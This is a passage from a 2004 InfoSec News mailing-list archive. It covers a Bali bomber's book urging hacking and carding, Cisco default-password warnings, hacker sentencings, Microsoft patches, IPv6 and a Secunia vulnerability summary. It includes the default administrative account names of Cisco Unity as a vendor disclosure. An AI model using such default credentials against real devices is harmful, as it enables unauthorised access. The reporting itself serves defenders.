Muslim skullcap, with his right arm outstretched and a single finger raised as he lectures the judges. Four thousand copies in Indonesian have been issued by a small publisher and are selling for about $4 each in at least seven cities across the islands of Java and Sumatra, said Achmad Michdan, Samudra's attorney, who wrote the forward. Michdan said the publisher is planning a second run and is considering translating the book into English, French and Arabic. Profits benefit Samudra's wife and children. Samudra remains on death row. Most of the book is a memoir that tracks Samudra from his early schooling in Java, through his arms training in the Afghan mountains, his exile in Malaysia and his return to Indonesia. It includes arguments for killing Western civilians and bitter critiques of U.S. policy in Israel, Afghanistan and Iraq, including photographs of Muslim civilian casualties. Toward the end, Samudra informs readers that the United States is not as invincible as they might think. "It would not be America if the country were secure. It would not be America if its computer network were impenetrable," he writes at the beginning of the hacking chapter. He continues by urging fellow militants to exploit this opening: "Any man-made product contains weakness because man himself is a weak creature. So it is with the Americans, who boast they are a strong nation." The chapter is less a how-to manual than a course of study for aspiring hackers and carders. Samudra directs them to specific Indonesian-language Web sites that provide instruction. For those who find these sites too sophisticated, he counsels first learning computer programming languages, in particular Linux, and suggests several other Web sites, including one run by young Muslims. Then he advises learning about hacking by finding mentors through online chats. He lists six chat rooms as sources. Next, Samudra discusses the process of scanning for Web sites vulnerable to hacking, then moves on to a three-page discussion on the basics of online credit card fraud and money laundering. "This is hacking for dummies," said Evan F. Kohlmann, a U.S. consultant on international terrorism who also reviewed the chapter. "But in this day and age, you don't have to be an expert hacker to have a tremendous impact." Kohlmann and other cyberterrorism experts said the kind of online fraud preached by Samudra is becoming increasingly attractive as a source of funding for al Qaeda operatives in several regions of the world. One of the chief hazards posed by Samudra's book is that it could direct religious extremists into the company of more accomplished hackers. Indonesian police assert their country now has more online credit card fraud than any other in the world. "If you succeed at hacking and get into carding, be ready to make more money within three to six hours than the income of a policeman in six months," Samudra tells his readers. "But don't do it just for the sake of money." He adds, "Remember, the main duty of Muslims is jihad in the name of God, to raise arms against the infidels, especially now the United States and its allies." Samudra had first sought to finance the Bali nightclub attacks by ordering the robbery of a shop selling gold jewelry in western Java. The heist allegedly netted five pounds of gold and $500. Then he turned to more lucrative targets on the Internet, police and prosecutors said. At Samudra's trial, police testified that his computer had been used to communicate in chat rooms with others involved in online credit card fraud and contained information on ways to obtain credit card details. Petrus Reinhard Golose, head of cybercrimes investigations for the Indonesian police, said in an interview that Samudra had asked for religious permission to conduct carding from Abubakar Baasyir, the radical cleric and alleged head of Jemaah Islamiah now on trial in Jakarta in connection with terrorist bombings, including the one in Bali. Golose said police did not know whether Baasyir had blessed Samudra's Internet activities. Special correspondent Noor Huda Ismail contributed to this report. *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Thu Dec 16 02:02:03 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 16 02:21:13 2004 Subject: [ISN] NSA to take lead on Defense info assurance Message-ID: http://gcn.com/vol1_no1/daily-updates/31383-1.html By Dawn S. Onley GCN Staff 12/15/04 The National Security Agency is filling a new role in the Defense Department: leading the information assurance path DOD takes to becoming a network-centric workplace. The new assignment is based on security work the agency did for DOD a few months ago building a security component for the Global Information Grid, said Priscilla E. Guthrie, deputy Defense CIO. "We asked NSA to build an IA architecture. NSA did a knock-your-socks-off job of doing this," Guthrie said today at a lunch the American Council for Technology and Industry Advisory Council sponsored in Arlington, Va. The IA component calls for integrating security into the GIG by, among other things, authenticating credentials and security clearances. The plan also calls for the use of some form of user token for the security architecture. Recently, DOD asked the agency to take the lead for information assurance initiatives across the department, Guthrie said, although that doesn't mean NSA will build everything or own all of the IA dollars. NSA will put together a GIG Information Assurance Portfolio so DOD can have a go-to agency if portions of the grid lack adequate security, Guthrie said. "NSA will deliver a vision for what it's going to take to secure the environment," she said. "Some have asked me, "Why NSA? They don't have the skill set." I don't know a better construct for the department. This is a blueprint for us to effect this broad IA environment." Guthrie also said the Pentagon is getting out of the business of application integration and moving more toward data-level integration. "If you only do integration of applications, I hope we put you out of business," Guthrie told the executives gathered at the lunch. "You must separate data from apps. If they are not separable, we don't want you in the department." From isn at c4i.org Thu Dec 16 02:02:13 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 16 02:21:15 2004 Subject: [ISN] Microsoft fixes three flaws in XP SP2 Message-ID: http://www.smh.com.au/news/Breaking/Microsoft-fixes-three-flaws-in-XP-SP2/2004/12/15/1102787120589.html By Sam Varghese December 15, 2004 Microsoft has released five security advisories for the month, all of which are rated important - second on a four-tier scale devised by the company - and affect various versions of Windows. The advisories, released on Tuesday US time, included three patches for holes in service pack 2 for Windows XP which was released in August. One patch fixes a flaw in some versions of Windows which was made public some weeks ago. Earlier this month, Microsoft issued an out-of-schedule patch to fix a critical flaw in Internet Explorer. The flaws are in WordPad, the Dynamic Host Control Protocol implementation in Windows NT 4.0, HyperTerminal, the Windows Kernel and the Local Security Authority Subsystem Service and Windows Internet Naming Service. The company has not addressed a longstanding flaw in Windows 2000, details of which were submitted by eEye Digital Security 134 days ago. A week ago, Microsoft said it was yet to asecertain the severity of this bug. A second vulnerability discovered by eEye affects Windows Me, Windows 2000, Windows XP and Windows 2003. Both these vulnerabilities can be remotely exploited, according to eEye, a company which has found numerous serious flaws in various Windows versions in the past, including the vulnerabilities that resulted in attacks by worms like Sasser, Witty, and Code Red. From isn at c4i.org Thu Dec 16 02:02:25 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 16 02:21:19 2004 Subject: [ISN] Default passwords on Cisco messaging, security products could pose risks, vendor warns Message-ID: http://www.nwfusion.com/news/2004/1215ciscosecurity.html [Can I get a collective DUH?!? - WK] By Phil Hochmuth Network World Fusion 12/15/04 Cisco this week warned that default passwords on some of its unified messaging and attack-detection products could allow unauthorized users to gain administrative access to the respective devices. Certain versions of Cisco's Unity unified messaging server and its Cisco Guard and Traffic Anomaly Detector products ship with common administrative account logons and passwords for each respective product. Unauthorized uses with these accounts and passwords could gain administrative access to the products, allowing them to change settings, and configurations or divert traffic on the respective devices. Unity is a server software product that integrates IP-based voicemail with Microsoft Exchange and Lotus Notes e-mail servers. When deployed with Microsoft Exchange, the software ships with the several default user name/password combinations that would give someone administrative access. These accounts include the following names, followed by an underscore "_" and the server's name: * Eadmin * UNITY_ * UAMIS_ * UOMNI_ * UVPIM_ * Esubsubscriber Cisco says that someone logging into a Unity server with these accounts could read incoming and outgoing messages on the Unity server, as well as change configurations of how messages are routed. These default account/password combinations are Unity versions 2, 3, and 4. Cisco says users should change the default passwords on these default accounts. A software fix is not necessary. The Cisco Guard and Traffic Anomaly Detector products, introduced this June, are security appliances used to detect potential denial-of-service traffic and divert the traffic to a non-critical network segment where it can be monitored and analyzed. Certain software versions on these appliances ship with default logon "root" and a password that is the same on all systems. Someone logging in as "root" on these devices could change configurations on the box, redirect traffic to other network segments, or simply deactivate the device, which would allow DoS attack traffic to enter a network undetected. Cisco says users should change the default "root" password on the affected appliances. Users can also upgrade to version 3.1 or later of the Cisco Guard and Cisco Traffic Anomaly Detector software, which asks users to choose a "root" password during installation. More information on each of these security notices can be found here [1] and here [2]. [1] http://www.cisco.com/en/US/products/products_security_advisory09186a008037cd59.shtml#summary [2] http://www.cisco.com/en/US/products/products_security_advisory09186a008037d0c5.shtml From isn at c4i.org Thu Dec 16 02:02:36 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 16 02:21:24 2004 Subject: [ISN] Michigan hacker who tapped into hardware chain's computers gets 9 years Message-ID: http://www.freep.com/news/statewire/sw108763_20041215.htm December 15, 2004 CHARLOTTE, N.C. (AP) -- One of three Michigan men who hacked into the national computer system of Lowe's hardware stores and tried to steal customers' credit card information was sentenced Wednesday to nine years in federal prison. The government said it is the longest prison term ever handed down in a computer crime case in the United States. Brian Salcedo of Whitmore Lake, Mich., pleaded guilty in August to conspiracy and other hacking charges. Salcedo's sentence, imposed by U.S. District Judge Lacy Thornburg, exceeds that given to the hacker Kevin Mitnick, who spent more than 5 1/2 years behind bars, according to a Justice Department Web site that tracks cyber-crime prosecutions. "I think the massive amount of potential loss that these defendants could have imposed was astounding, so that's what caused us to seek a substantial sentence against Mr. Salcedo," federal prosecutor Matthew Martens said. Two other men are awaiting sentencing in the Lowe's case. One of them, Adam Timmins, of Waterford Township, Mich., became one of the first people convicted of "wardriving," in which hackers go around with an antenna, searching for vulnerable wireless Internet connections. Prosecutors said the three men tapped into the wireless network of a Lowe's store in Southfield, Mich., used that connection to enter the chain's central computer system in North Wilkesboro, N.C., and installed a program to capture credit card information. Lowe's officials said the men did not obtain any such information. The case was prosecuted in Charlotte because it is home to an FBI cyber-crime task force. Mitnick led the FBI on a three-year manhunt that ended in 1995 and is said to have cost companies millions of dollars by stealing their software and altering computer information. Victims included Motorola, Novell, Nokia and Sun Microsystems. -=- On the Net: U.S. Justice Department computer intrusion cases: http://www.cybercrime.gov/cccases.html From isn at c4i.org Fri Dec 17 03:24:16 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 17 03:40:43 2004 Subject: [ISN] Michigan hacker who tapped into hardware chain's computers gets 9 years Message-ID: Forwarded from: matthew patton I'm glad they got caught and all but 9yrs for a guy who hacked the system but DID NOT get any credit cards? If he'd gotten his hands on a few thousand and went on a shopping spree, sure but this is like a guy who gets caught breaking and entering but he's stuck 1/2 way thru the door with his hands empty. And Micknick got 5 and HE stole a ton of stuff... I thought the punishment was supposed to match the crime or some such blather. From isn at c4i.org Fri Dec 17 03:24:45 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 17 03:40:45 2004 Subject: [ISN] The move on to IPv6 Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,98298,00.html Opinion by Cody Christman Verio DECEMBER 16, 2004 COMPUTERWORLD Despite the success of Internet Protocol Version 4 (IPv4), at the age of 31, this current protocol is due for a significant technology makeover. The original design of IP wasn't intended for many of today's Internet uses. The fathers of the Internet couldn't foresee today's typical Wi-Fi Web surfer at the local coffee shop conducting a secure transaction over a browser. Most security precautions were ignored in the development of IPv4, and they have continued to be a challenge for application developers since then. The IPsec security protocol was an afterthought, and Network Address Translation (NAT) -- which has been widely deployed to solve the address-depletion problem and for perceived security benefits -- makes true end-to-end, secure applications difficult to deploy. In IPv6, however, IPsec support is mandated, allowing devices to securely authenticate remote nodes and encrypt communication with them. In addition, NAT is eliminated in IPv6, allowing all nodes to communicate with one another using globally routable addresses. Since IPv6 offers almost infinite address space, NAT isn't needed. This brings back the end-to-end nature for which the Internet was designed in the first place. Other features built into IPv6 help to augment security, such as autoconfiguration, quality of service (QoS) and mobility. These security features help to create a new business model -- one of secure, end-to-end communications between almost any types of devices, fixed or mobile. This is in contrast to today's IPv4 networks, where NAT generally reduces communication to one-way (outbound), and encryption, when available, is usually implemented on global address segments while LAN segments remain unencrypted and unsecured. The U.S. Department of Defense has embraced IPv6 for the above-mentioned reasons. In June 2003, the DOD announced its plan to complete transition to IPv6 by fiscal 2008, and as of Oct. 1, 2003, all network assets developed, procured or acquired are to be IPv6-capable. The DOD concluded that IPv6 adoption is necessary to meet the agency's requirements for mobility and end-to-end security. The DOD's IT budget is the government's largest at $25 billion per year, giving an enormous boost to network security and IPv6. The DOD has adopted a net-centric technical vision. According to this vision, future combat systems demand ubiquity (IPv6-centricity), mobility and ad hoc networking and security. For example, from a networking standpoint, the soldier is viewed as a site -- a network of onboard systems providing integrated real-time data. Weapon firing and supply data would be fed back to commanders as well as precise position information. Health information such as a soldier's heart rate, blood pressure and temperature would also be relayed. The soldier could also receive positioning data about friends and foes to increase situational awareness and save lives. The data security (authentication and encryption) requirements in this model are an obvious necessity. Unlike today's military model of autonomous systems and a broadcast information push, the net-centric vision relies on bidirectional, end-to-end secure communications enabled by IPv6. For businesses and consumers, there are an unforeseeable number of new applications and devices that can be networked in a secure fashion. IPv6 is already making an impact in the field of home networking, including appliance management, multimedia entertainment and home security. Such applications, especially home security tools, demand end-to-end authentication and encryption. With IPv6, Digital Subscriber Line and cable modem subscribers can set up home networks and monitor and control devices securely from any remote location. Wireless network cameras can be easily deployed to monitor a residence, and electronic locks can be installed to remotely lock or unlock doors. Businesses will be able to leverage the security, mobility and QoS features of IPv6. For example, the IP flow-label QoS feature built directly into IPv6 will help improve the quality of encrypted voice over IP calls. In addition, traveling salespeople can wirelessly transfer information and documents safely from remote locations to their headquarters, even while roaming through different Wi-Fi hot spots. Some argue that IPv6 proponents use v4 address-depletion scare tactics to promote the new protocol. Though address-space depletion is a real issue, there are many other forces driving IPv6 deployment. True end-to-end security, which is enabled by IPv6 but doesn't exist in IPv4 as it's often implemented today, is the future of the Internet. Time to get ready Even if businesses don't have immediate plans to implement IPv6, preparing for the inevitable transition now as opposed to later will only decrease the burden on IT administrators. This process doesn't have to be daunting if a thoughtful approach is taken. Plans should accommodate an implementation spanning a maximum of three to four years. When IPv6 gains momentum, migration to the new protocol will be swift, and those who haven't planned ahead risk finding themselves at a disadvantage. Having plans in place will also simplify the auditing processes for hardware, software (shrink-wrapped and internally developed) and operating systems on IPv6 compatibility. As long as vendor-support contracts have been maintained, this process shouldn't be too painful or expensive. Most hardware will already be compliant, and software and operating system upgrades can follow normal maintenance cycles within the transition window. If precautions aren't taken, the transition from IPv4 to IPv6 could be cause for network security concerns. Without proper perimeter security, hackers could use IPv6 to gain access to a LAN, which could compromise both IPv6 and IPv4 network assets. Therefore, the same care taken to write and implement an IPv4 security policy should be taken with IPv6, even with all its benefits. Introducing IPv6 into a network, like any other new protocol, requires that firewall configurations and other security measures be well thought-out and tested. Finally, there are several IPv4/IPv6 interoperability mechanisms available to businesses to assist in the transition. They fall into three major categories: dual-stack, tunneling and translation. A dual-stack transition is the generally preferred method when devices are both IPv4- and IPv6-aware, allowing the two protocols to coexist in the same network. Tunneling techniques allow the transport of IPv6 traffic over an IPv4 infrastructure -- as much of the Internet is today. The final interoperability method -- protocol translation -- may be required in some instances, but is generally not recommended because it's basically an IPv4/IPv6 NAT. The interoperability method or combination of methods will depend on each business' environment and network requirements. IPv6 offers several alternatives to choose from that should suit any need. These tools, along with a well thought-out and executed migration plan, will lead to a smooth transition to IPv6. Cody Christman is director of product engineering at Verio Inc., an Englewood, Colo.-based provider of Internet access, Web site hosting and other network services. From isn at c4i.org Fri Dec 17 03:25:30 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 17 03:40:47 2004 Subject: [ISN] Legal questions dog Microsoft anti-spyware buy Message-ID: http://www.nwfusion.com/news/2004/1216legalquest.html By Paul Roberts IDG News Service 12/16/04 With the ink barely dry on Microsoft's acquisition of anti-spyware company Giant Company Software, questions have arisen about the ownership of the anti-spyware code Microsoft bought. Microsoft acknowledged that Sunbelt Software of Clearwater, Fla., is part owner of Giant's AntiSpyware software. That agreement between Giant and Sunbelt does not prevent Microsoft from further developing new products based on the Giant code, according to Microsoft. However, Sunbelt President Alex Eckelberry said that his company has exclusive rights over elements of the technology, including the ability to offer SDKs for Giant AntiSpyware technology. That could make it difficult for Microsoft to integrate Giant technology with other products. Microsoft issued a short statement regarding Sunbelt's claims Thursday saying, "We understand that Giant granted a co-ownership right to Sunbelt concerning an earlier version of Giant?s anti-spyware software product. However, the granting of that right to Sunbelt does not constrain either party from innovating and developing new products that are based on that earlier version." A Microsoft spokeswoman declined to comment specifically on Sunbelt's other claims. Sunbelt and Giant have had a close business relationship since 2002, with Sunbelt licensing and selling technology developed by Giant, according to Eckelberry. Among other things, Sunbelt struck an agreement to sell Giant's antispam product, Spam Inspector, under its own label, iHateSpam. Until September, the company also sold a product, CounterSpy, that used Giant's AntiSpyware engine. The companies parted ways in September, with Sunbelt focusing on the corporate antispyware market and Giant focused on the home PC antispyware market, Eckelberry said. However, Sunbelt claims co-ownership of everything related to Giant's AntiSpyware product up to Sept. 20, including "the user interface elements, explorer tools (and ) software update services," Eckelberry said. While the co-ownership agreement will not prevent Microsoft from changing the Giant product to suit its own needs, Sunbelt's exclusive rights to create and distribute SDKs for the Giant AntiSpyware engine could require Microsoft to seek permission from Sunbelt before allowing third-party companies access to Giant's data. "For example, if Symantec went to Microsoft and said 'Hey, we want to get some of that (antispyware) data', they would have to go through Sunbelt," Eckelberry said. "It's an interesting situation," said Steve Frank, a partner in the patent and intellectual property group at Boston law firm Testa, Hurwitz and Thibeault. While Eckelberry said Sunbelt has no right to share in future profits from Giant sales, the company still expects to benefit from the acquisition through co-ownership of Giant AntiSpyware definitions, which can be used in Sunbelt products. Sunbelt also has the right to develop and distribute the Giant SDK, he said. Microsoft was probably aware of Giant's obligations to Sunbelt, but "didn't care," or were impressed enough with the Giant technology to overlook the contractual complications, Eckelberry said. Microsoft and Sunbelt have been in contact, but have discussed mostly "boring, technical stuff," such as distribution of the Giant AntiSpyware definitions. The companies have not discussed issues surrounding the SDK, Eckelberry said. But attorney Frank doubts that Microsoft would have been so cavalier, had it known about Sunbelt's rights to the Giant code. "These are exactly the kinds of things that come out of the woodwork when there's lots of money on the table," he said. "This will come as most unwelcome news." From isn at c4i.org Fri Dec 17 03:25:52 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 17 03:40:49 2004 Subject: [ISN] Second hacker who entered Lowe's computers gets 26 months Message-ID: http://www.detnews.com/2004/technology/0412/17/technology-35606.htm By Paul Nowell Associated Press December 17, 2004 CHARLOTTE, N.C. -- A second defendant was sentenced Thursday to more than two years in federal prison for his role in a scheme to hack into the Lowe's national computer system to steal credit card information. U.S. District Judge Lacy Thornburg sentenced Adam Botbyl to two years and two months. Another defendant, Brian Salcedo, was sentenced Wednesday to nine years in prison. Both of the 21-year-olds are from Michigan. Assistant U.S. Attorney Matthew Martens told the judge the defendants tried to get data that could have caused huge economic losses for the Mooresville-based home improvement chain and its customers. "The damage that could have been caused by these defendants would have been astronomical," he said. "The fact that it didn't happen wasn't because they retreated. It's because the FBI caught them in the act." Botbyl, who pleaded guilty to one count of conspiracy, could have faced five years in prison. "I would like to apologize to the court and to the victim, Lowe's," he told the judge. Salcedo pleaded guilty in August to conspiracy, transmitting computer code to cause damage to a computer, unauthorized computer access and computer fraud. A third defendant, Paul Timmins, awaits sentencing after pleading guilty in the case. -=- U.S. Justice Department computer intrusion cases: http://www.cybercrime.gov/cccases.html From isn at c4i.org Fri Dec 17 03:26:16 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 17 03:40:51 2004 Subject: [ISN] Students uncover dozens of Unix software flaws Message-ID: http://news.zdnet.com/2100-1009_22-5492969.html By Robert Lemos CNET News.com December 15, 2004 Students of iconoclastic computer scientist Daniel Bernstein have found some 44 security flaws in various Unix applications, according to a list of advisories posted online. The flaws, which range from minor slipups in rarely used applications to more serious vulnerabilities in software that ships with most versions of the Linux operating system, were found as part of Bernstein's graduate-level course at the University of Illinois at Chicago. "Every program is used somewhere--this was a requirement for the homework--but the programs vary widely in popularity," Bernstein, a professor of computer science at the university, stated in an e-mail interview Thursday. The advisories regarding the flaws were dated Wednesday and can be found on the Web site of student James Longstreet. Bernstein said it was necessary for programmers to learn security, both to analyze existing programs and to create new ones. "If any (programmer makes) a security mistake, then your computer is vulnerable to attack," he said in the e-mail interview. "So we have to teach all programmers how to avoid these mistakes." The latest crop of security flaws comes two days after a software-testing company announced that it had found 985 flaws in the latest Linux kernel during the past four years using the company's analysis software. While the number seems high, the company said it is far lower than the number associated with most commercial software. Each person in the class during the fall semester had to find 10 flaws, a task that counted toward 60 percent of their grade for the class, according to class notes posted on Bernstein's Web site. With only 44 flaws discovered among a reported 25 students, Bernstein said he is rethinking the grading curve. "At the end of the course, I decided to throw that scale away and think about how much the students had learned," he wrote From isn at c4i.org Fri Dec 17 03:27:43 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 17 03:40:54 2004 Subject: [ISN] Secunia Weekly Summary - Issue: 2004-51 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2004-12-09 - 2004-12-16 This week : 64 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=s ======================================================================== 2) This Week in Brief: ADVISORIES: Microsoft has issued the monthly security updates for December. The updates covers vulnerabilities in almost every single operating system from Microsoft. All Microsoft users are advised to visit WindowUpdate and check for available updates. Additional details about the specific vulnerabilities can be found in referenced Secunia advisories below. References: http://secunia.com/SA13466/ http://secunia.com/SA13465/ http://secunia.com/SA13464/ http://secunia.com/SA13463/ http://secunia.com/SA13462/ -- 3 more browsers have been found vulnerable to the Window Injection vulnerability, which was disclosed last week by Secunia Research. The affected browsers are: iCab, Internet Explorer for Mac, and OmniWeb. Secunia has an online demonstration of the vulnerability here: http://secunia.com/multiple_browsers_window_injection_vulnerability_test/ References: http://secunia.com/SA13356/ http://secunia.com/SA13412/ http://secunia.com/SA13418/ VIRUS ALERTS: During the last week, Secunia issued 1 MEDIUM RISK virus alert and 1 HIGH RISK virus alert. Please refer to the grouped virus profiles below for more information: Zafi.D - HIGH RISK Virus Alert - 2004-12-15 09:04 GMT+1 http://secunia.com/virus_information/13871/zafi.d/ Zafi.D - MEDIUM RISK Virus Alert - 2004-12-14 15:31 GMT+1 http://secunia.com/virus_information/13871/zafi.d/ ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA13129] Mozilla / Mozilla Firefox Window Injection Vulnerability 2. [SA13251] Microsoft Internet Explorer Window Injection Vulnerability 3. [SA12889] Microsoft Internet Explorer Two Vulnerabilities 4. [SA13253] Opera Window Injection Vulnerability 5. [SA13252] Safari Window Injection Vulnerability 6. [SA13402] Netscape Window Injection Vulnerability 7. [SA13404] Microsoft Internet Explorer FTP Command Injection Vulnerability 8. [SA13254] Konqueror Window Injection Vulnerability 9. [SA11978] Multiple Browsers Frame Injection Vulnerability 10. [SA12712] Mozilla / Mozilla Firefox / Camino Tabbed Browsing Vulnerabilities ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA13464] Microsoft Windows HyperTerminal Buffer Overflow Vulnerability [SA13462] Microsoft Word for Windows Converter Buffer Overflow Vulnerabilities [SA13427] Gore: Ultimate Soldier CD-Key Validation Buffer Overflow [SA13426] GameSpy CD-Key Validation SDK Buffer Overflow Vulnerability [SA13411] MIMEsweeper for SMTP PDF File Processing Denial of Service [SA13466] Microsoft Windows WINS "Name" Validation Vulnerability [SA13463] Microsoft Windows NT DHCP Buffer Overflow Vulnerabilities [SA13423] Codename Eagle Empty UDP Datagram Denial of Service Vulnerability [SA13415] FirstClass HTTP Large Request Handling Denial of Service [SA13465] Microsoft Windows Kernel and LSASS Privilege Escalation Vulnerabilities [SA13460] Kerio MailServer / ServerFirewall Potential User Password Disclosure [SA13445] Symantec Windows LiveUpdate NetDetect Privilege Escalation [SA13438] Winmail Server Installation Path Disclosure Weakness [SA13416] F-Secure Policy Manager "fsmsh.dll" Path Disclosure Weakness [SA13409] Microsoft Office SharePoint Portal Server Disclosure of User Credentials UNIX/Linux: [SA13474] Adobe Acrobat Reader "mailListIsPdf()" Function Buffer Overflow [SA13461] Debian update for zgv [SA13435] Red Hat update for imlib [SA13425] Citadel/UX "lprintf()" Function Format String Vulnerability [SA13417] Debian update for xfree86 [SA13456] Red Hat update for ncompress [SA13449] zgv/xzgv Multiple Integer Overflow Vulnerabilities [SA13439] Gentoo update for file [SA13436] Sun Solaris Sendmail DNS TXT Records Buffer Overflow [SA13428] Gentoo update for phprojekt [SA13418] OmniWeb Window Injection Vulnerability [SA13412] iCab Window Injection Vulnerability [SA13459] Gentoo update for nfs-utils [SA13458] Red Hat update for itanium kernel [SA13457] Red Hat update for kernel [SA13440] nfs-utils "getquotainfo()" Buffer Overflow Vulnerability [SA13429] SGI IRIX update for samba [SA13455] Red Hat update for apache/mod_ssl [SA13454] Red Hat update for ruby [SA13447] Opera Default Application "kfmclient exec" Security Issue [SA13437] Sun Java System Web Server / Application Server Session ID Disclosure [SA13432] mnoGoSearch Cross-Site Scripting Vulnerabilities [SA13469] Linux Kernel IGMP and "__scm_send()" Vulnerabilities [SA13473] Debian update for atari800 [SA13442] Mandrake update for postgresql [SA13430] mtr "mtr_curses_keyaction()" Function Buffer Overflow Vulnerability [SA13410] Linux Kernel "sys32_ni_syscall" and "sys32_vm86_warning" Buffer Overflows [SA13480] Gentoo update for ncpfs [SA13444] Mandrake update for iproute2 [SA13443] OpenBSD isakmpd Denial of Service Vulnerability Other: [SA13434] Novell Netware "nlm" Screensaver Password Bypass Vulnerability Cross Platform: [SA13479] GNUBoard "doc" Parameter Arbitrary File Inclusion Vulnerability [SA13478] MoniWiki Multiple File Extensions Script Upload Vulnerability [SA13471] Adobe Reader / Adobe Acrobat Multiple Vulnerabilities [SA13468] Ethereal Multiple Vulnerabilities [SA13448] NetMail IMAPD Unspecified Buffer Overflow Vulnerability [SA13424] phpMyAdmin Two Vulnerabilities [SA13421] phpBB Attachment Mod Two Vulnerabilities [SA13419] MediaWiki "images" Arbitrary Script Upload and Execution Vulnerability [SA13467] phpGroupWare Cross-Site Scripting and SQL Injection Vulnerabilities [SA13451] Sugar Sales Arbitrary Local File Inclusion Vulnerabilities [SA13446] Lithtech Engine UDP Datagram Denial of Service Vulnerability [SA13431] SQLgrey Postfix greylisting service Unspecified SQL Injection [SA13422] PhpDig Unspecified Vulnerability [SA13420] PHP Live! Unspecified Vulnerability [SA13413] IlohaMail Unspecified Vulnerability [SA13452] UBB.threads "Cat" Cross-Site Scripting Vulnerabilities [SA13441] UseModWiki "wiki.pl" Cross-Site Scripting Vulnerability [SA13414] PHP Gift Registry "message" Cross-Site Scripting Vulnerabilities ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA13464] Microsoft Windows HyperTerminal Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-14 Brett Moore has reported a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13464/ -- [SA13462] Microsoft Word for Windows Converter Buffer Overflow Vulnerabilities Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-14 Some vulnerabilities have been reported in Microsoft Windows, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13462/ -- [SA13427] Gore: Ultimate Soldier CD-Key Validation Buffer Overflow Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-14 Luigi Auriemma has reported a vulnerability in Gore: Ultimate Soldier, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13427/ -- [SA13426] GameSpy CD-Key Validation SDK Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-13 Luigi Auriemma has reported a vulnerability in the Gamespy CD-Key Validation SDK, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13426/ -- [SA13411] MIMEsweeper for SMTP PDF File Processing Denial of Service Critical: Moderately critical Where: From remote Impact: DoS Released: 2004-12-10 A vulnerability has been reported in MIMEsweeper for SMTP, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13411/ -- [SA13466] Microsoft Windows WINS "Name" Validation Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-14 Kostya Kortchinsky has reported two vulnerabilities in Microsoft Windows, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13466/ -- [SA13463] Microsoft Windows NT DHCP Buffer Overflow Vulnerabilities Critical: Moderately critical Where: From local network Impact: System access, DoS Released: 2004-12-14 Kostya Kortchinsky has reported two vulnerabilities in Microsoft Windows NT, allowing malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13463/ -- [SA13423] Codename Eagle Empty UDP Datagram Denial of Service Vulnerability Critical: Less critical Where: From remote Impact: DoS Released: 2004-12-13 Luigi Auriemma has reported a vulnerability in Codename Eagle, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13423/ -- [SA13415] FirstClass HTTP Large Request Handling Denial of Service Critical: Less critical Where: From remote Impact: DoS Released: 2004-12-14 XWaRloRDX and DiLA have reported a vulnerability in FirstClass, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13415/ -- [SA13465] Microsoft Windows Kernel and LSASS Privilege Escalation Vulnerabilities Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-14 Cesar Cerrudo has reported two vulnerabilities in Microsoft Windows, allowing malicious, local users to escalate their privileges. Full Advisory: http://secunia.com/advisories/13465/ -- [SA13460] Kerio MailServer / ServerFirewall Potential User Password Disclosure Critical: Less critical Where: Local system Impact: Exposure of sensitive information Released: 2004-12-14 Javier Munoz has reported a security issue in Kerio MailServer and Kerio ServerFirewall, which potentially can be exploited by malicious, local users to gain knowledge of sensitive information. Full Advisory: http://secunia.com/advisories/13460/ -- [SA13445] Symantec Windows LiveUpdate NetDetect Privilege Escalation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-14 Secure Network Operations has reported a vulnerability in Symantec Windows LiveUpdate, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13445/ -- [SA13438] Winmail Server Installation Path Disclosure Weakness Critical: Not critical Where: From remote Impact: Exposure of system information Released: 2004-12-13 Ziv Kamir has reported a weakness in WinMail Server, which can be exploited by malicious people to disclose certain system information. Full Advisory: http://secunia.com/advisories/13438/ -- [SA13416] F-Secure Policy Manager "fsmsh.dll" Path Disclosure Weakness Critical: Not critical 